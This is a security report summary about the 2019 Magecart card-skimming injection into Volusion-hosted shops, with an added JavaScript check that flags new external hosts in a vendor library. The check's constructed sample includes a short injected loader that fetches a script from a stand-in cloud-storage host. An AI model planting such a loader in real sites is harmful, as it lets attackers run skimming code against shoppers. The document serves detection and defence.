FIN6 Compromised E-commerce Platform via Magecart to Inject Credit Card Skimmers Into Thousands of Online Shops

Trend Micro discovered that the online credit card skimming attack known as Magecart or E-Skimming was actively operating on 3,126 online shops. Our data shows that the attack started on September 7, 2019. All of the impacted online shops are hosted on the cloud platform of the e-commerce service provider “Volusion,” one of the top e-commerce platforms in the market. This is actually the third time we have identified a card skimmer injected into the cloud platform of an e-commerce provider. Two other businesses were already victimized this year: a campus e-commerce platform and a hotel e-commerce platform. These targets are obviously appealing to cybercriminals since they are connected to multiple — in this most recent case, thousands of — online shops.

We found malicious code injected into a JavaScript library provided by Volusion to their client shops. The injected code loaded another JavaScript file stored on a Google Storage service. The loaded script is almost a direct copy of a normal JavaScript library but has a credit card skimmer carefully integrated. When customers submit their payment information, the skimmer copies the personal information and credit card details and sends them to an exfiltration server belonging to the attackers.
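
A defender-side check for the tampering described above, as an added example that is not taken from Trend Micro's report: it compares the external hosts referenced by a vendor-supplied library against a known-good copy and reports any host that is new. The function names, hostnames and sample scripts are constructed for illustration, and the check only sees URLs written as string literals.

```javascript
// Diff the external hosts referenced by a vendor-supplied script against a
// known-good copy. All names and sample data below are constructed.

// Matches absolute and protocol-relative URLs inside quoted string literals.
const URL_LITERAL = /["'`]((?:https?:)?\/\/[^"'`\s]+)["'`]/g;

function referencedHosts(source) {
  const hosts = new Map(); // host -> first line number where it appears
  source.split('\n').forEach((line, i) => {
    for (const m of line.matchAll(URL_LITERAL)) {
      let host;
      try {
        // Protocol-relative URLs need a base before they can be parsed.
        host = new URL(m[1], 'https://placeholder.invalid').hostname;
      } catch {
        continue; // not a parseable URL, ignore it
      }
      if (host && !hosts.has(host)) hosts.set(host, i + 1);
    }
  });
  return hosts;
}

function newHosts(baselineSource, currentSource, allowedHosts = []) {
  const known = new Set([...referencedHosts(baselineSource).keys(), ...allowedHosts]);
  const findings = [];
  for (const [host, line] of referencedHosts(currentSource)) {
    if (!known.has(host)) findings.push({ host, line });
  }
  return findings;
}

// Constructed sample: a benign library and a tampered copy of it.
const BASELINE = [
  'function initMenu() {',
  '  var cdn = "https://cdn.shop-platform.example/assets/menu.css";',
  '  loadCss(cdn);',
  '}',
].join('\n');

const TAMPERED = BASELINE + '\n' + [
  '(function () {',
  '  var s = document.createElement("script");',
  '  s.src = "//storage.cloud-provider.example/bucket/resize.js";',
  '  document.head.appendChild(s);',
  '})();',
].join('\n');

console.log(newHosts(BASELINE, TAMPERED));
```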

Source: Trend Micro